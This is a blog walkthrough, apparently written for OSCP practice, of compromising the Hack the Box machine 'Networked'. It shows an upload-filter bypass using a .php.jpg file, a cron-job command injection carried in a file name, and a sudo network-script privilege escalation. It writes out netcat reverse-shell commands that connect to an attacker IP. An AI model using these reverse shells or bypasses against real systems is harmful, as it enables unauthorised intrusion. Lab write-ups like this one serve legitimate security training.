OSCP PREP BOX 7: HtB Networked

Written By Ryan Daly

Onto box #7! Moving right along. Today we’ll be taking on Networked, which is an easy box on Hack the Box. To start off, we’ll run our default nmap scan which shows the following results:

Not a whole lot of open ports and we see some older versions of SSH and Apache running which are interesting but I’ll hold off on that for now.

Taking a look at the web page we can see it presents as a very simple text-only page. When you poke at the page source, though, we can see comments suggesting there’s some unlinked content.

Let’s run a gobuster to see what we can enumerate:

When we navigate over to /backup, we can see it has directory listing enabled and we can download a .tar file called backup.tar. I find it’s cleaner to view the .tar file from the file explorer than in the command line. So when we open it we see this is a backup of the webserver! This is great. So now we see a bunch of other pages that end in .php that our initial directory bruteforce didn’t find. If we read over the upload.php script we can see that we have some upload filters and also that it uploads to the /uploads directory.

Let’s check out uploads.php

So we see from the uploads.php script we need an image file that contains .jpg, but this does seem to be a whitelist, so we may have trouble uploading a php shell. I started testing to see if we could do any double extensions to bypass it. It is important to send it through burp to check content filters as well. Also, there could be some blacklists in effect so we’re going to test that as well.

The biggest thing here is size compression.. As I began going through testing, I realized that the uploads.php script ONLY allows image files less than 60000 bytes. We then have to pay attention to naming conventions. We can see in the PHP script that the script uses the $_SERVER[‘REMOTE_ADDR’] to get the address of our IP. It then modifies it by replacing periods with underscores. The file extension is then determined by the original file’s extension and so our file becomes (for example)  10_10_10_10.jpeg.

So now our goal becomes filter bypass. We know we have to include .jpg in the extension, and we have to keep the file size under 60000 bytes.

I tried first just getting RCE which worked by including a php code execution script within my .jpg with the .php.jpg extension.

I had to add a MIME type of GIF8 but it worked! Shell acquired.


Okay, so as we poke around in the file system, we can see that there’s a cronjob being ran by the user guly. As we look at the source code of it we have a few potential vectors of attack to manipulate the cron job. In essence, the script just goes through all the files in the uploads directory, looks for extensions that are considered “suspicious,” then deletes them and uses the file name to send an email to guly. So, what if we created a file with a name that executes a shell script when it gets emailed? It took me a while to play around with this. I initially attempted to create a file called: shell.php; nc -e /bin/bash 10.10.14.9 9001. But I couldn’t get the file creation with the forward slashes in /bin/bash. Annoyingly, the cronjob runs every 3 minutes, so it takes a bit of waiting around to test.. (*/3 * * * *).

It took A LOT of testing with this and I kept getting hung up on slashes in the file name. I ended up researching and finding out the netcat lets you execute commands without having to use like /bin/bash. So you can run nc -c bash <LHOST> <LPORT>. I was so close with my initial netcat -e argument and went down hours of rabbit holes.. classic. I then further shot myself in the foot by executing the cronjob myself and then getting another shell as Apache.. genius. Anyways, we get our shell!

From here, we very quickly run sudo -l to check what the guly user can run as root and we see guly can run a script called changename.sh.

When we take a look at the script, we can see that it sets up an interface and accepts user input to do so. I tried using -h with the script to see if it accepted any parameters but it did not. I tried messing around aimlessly with entering /bin/bash for all the parameters but didn’t have any luck with that. I then took to Google and searched for network script privilege escalation and came across this post on vulmon (https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f)

So essentially, if we add a space, everything after that space will be executed as root.. pretty easy..

I just added a space after one of the parameters and entered “bash.”

Root obtained!

Ryan Daly
Previous

OSCP PREP BOX 8: HtB Editorial
Next

OSCP PREP BOX 6: HtB BoardLight